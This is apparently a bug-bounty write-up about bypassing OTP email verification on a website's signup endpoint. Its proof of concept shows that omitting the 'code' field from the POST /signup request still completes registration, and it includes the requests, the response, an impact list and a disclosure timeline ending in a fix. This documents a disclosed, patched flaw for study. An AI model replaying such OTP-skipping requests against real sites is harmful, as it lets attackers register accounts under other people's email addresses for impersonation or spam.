WRITEUP, BUG HUNTING, BUSINESS LOGIC ERROR

Business Logic Error Bypass OTP Verification [EN]

Introduction

During free time, I identified a business logic flaw on a website, that allowed me to bypass the One-Time Password (OTP) verification step during account registration. The website itself is intended to have OTP verification to ensure that users own the email addresses that they register with. So, by skipping this mechanism, an attacker could register accounts using any email address that can lead to impersonation.

Proof of Concept

We know that the account signup flow on the website requires users to provide email address, username, password, and an OTP sent to their email. The OTP is meant to serve as the ownership of the email. However, by analyzing the HTTP request to the /signup endpoint, I noticed that the backend was not properly enforcing OTP verification. In other words, if the code parameter (OTP) was omitted from the request body, the system would still complete registration successfully.

  1. Normal Request with OTP. 
         POST /signup HTTP/2
     Host: example.com
     Content-Type: application/json;charset=UTF-8

     {
     "account": {
         "first_name": "Dadang",
         "last_name": "Knalpot",
         "email": "victim@example.com",
         "username": "testuser",
         "password": "Password123!",
         "token": null,
         "code": "624187",   // OTP field
         }
     }

    This is the intended flow, the user must provide the OTP sent to their email.

  2. Bypassing the OTP. 
         POST /signup HTTP/2
     Host: example.com
     Content-Type: application/json;charset=UTF-8

     {
     "account": {
         "first_name": "Dadang",
         "last_name": "Knalpot",
         "email": "victim@example.com",
         "username": "testuser",
         "password": "Password123!",
         "token": null,
         }
     }

    Notice that the parameter code field is completely removed.

    Response:

     HTTP/2 200 OK

 {
     "success": true
 }

    Despite no OTP being provided, the account registration succeeds.

The vulnerability was limited to the registration page. While it allowed creating accounts with arbitrary email addresses, the site enforced OTP verification again during login, which could not be bypassed. Therefore, the issue was classified as a medium-severity business logic flaw. CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Security Impact

  • Bypass Email Ownership Proof, attacker can register with any email address without verifying access to the inbox.
  • Malicious actors could pre-register accounts with email addresses belonging to real users.
  • Attackerss could mass register fake accounts for spam, phising, or any others malicious activities.

Timeline

  • July 16, 2025 - Report submitted
  • August 13, 2025 - Issue triaged and confirmed in scope.
  • August 20, 2025 - Issue resolved and patch applied.
updated_at 30-08-2025